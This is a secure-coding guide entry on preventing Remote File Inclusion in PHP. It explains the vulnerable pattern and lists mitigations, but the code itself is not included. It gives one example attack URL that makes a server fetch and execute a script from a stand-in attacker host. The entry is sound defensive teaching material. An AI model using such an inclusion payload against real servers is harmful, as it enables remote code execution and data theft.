Need

Prevention of remote file inclusion attacks

Context

• Usage of PHP 5.0+ for server-side scripting and web development
• Usage of PHP for server-side scripting and web development

Description

Non compliant code

The above PHP script is vulnerable to Remote File Inclusion (RFI) because it directly uses the value from the GET parameter 'file' as the file to include. This is dangerous because an attacker could provide a URL to a malicious script hosted on their own server, which would then be included and executed by the server running this script.

For example, an attacker could request the following URL:

http://yourserver.com/vulnerable_script.php?file=http://attackerserver.com/malicious_script.php

This would cause the server to download and execute malicious_script.php from attackerserver.com, potentially leading to data leakage, remote code execution, or other serious security issues.

This is a serious vulnerability that can lead to full system compromise if an attacker is able to execute arbitrary commands on the server. It is recommended to avoid using user input directly in file include operations to prevent this kind of attack.

Steps

• Validate the input: Ensure that the input provided in the 'file' parameter is expected. This can be done by checking if the input matches a list of allowed files.
• Sanitize the input: Remove or escape special characters that can be used to manipulate the file path. This can prevent directory traversal attacks.
• Limit the scope: Restrict the directories where files can be included from. This can be done by defining a base directory and only allowing files within this directory to be included.
• Use absolute paths: Instead of using user input to determine the file path, use absolute paths in your code. This can prevent an attacker from being able to control the file path.
• Disable allow_url_include: In the PHP configuration, disable the 'allow_url_include' setting. This prevents PHP from including files from remote locations.

Compliant code

The updated code includes several security measures to prevent Remote File Inclusion (RFI) attacks.

Firstly, it validates the input by checking if the provided file name is in the list of allowed files. If the file is not in the list, the script will terminate with an error message.

Secondly, it sanitizes the input by using the basename function. This function returns the file name from a path, effectively removing any directory paths from the input. This prevents directory traversal attacks where an attacker could manipulate the file path to access files outside of the intended directory.

Thirdly, it uses an absolute path for the file to be included. The base directory is defined in the code and the file name from the user input is appended to this. This ensures that only files within the specified directory can be included, limiting the scope of potential files an attacker could include.

Lastly, it's recommended to disable the 'allow_url_include' setting in the PHP configuration. This prevents PHP from including files from remote locations, adding an additional layer of protection against RFI attacks.

References

• 061. Remote File Inclusion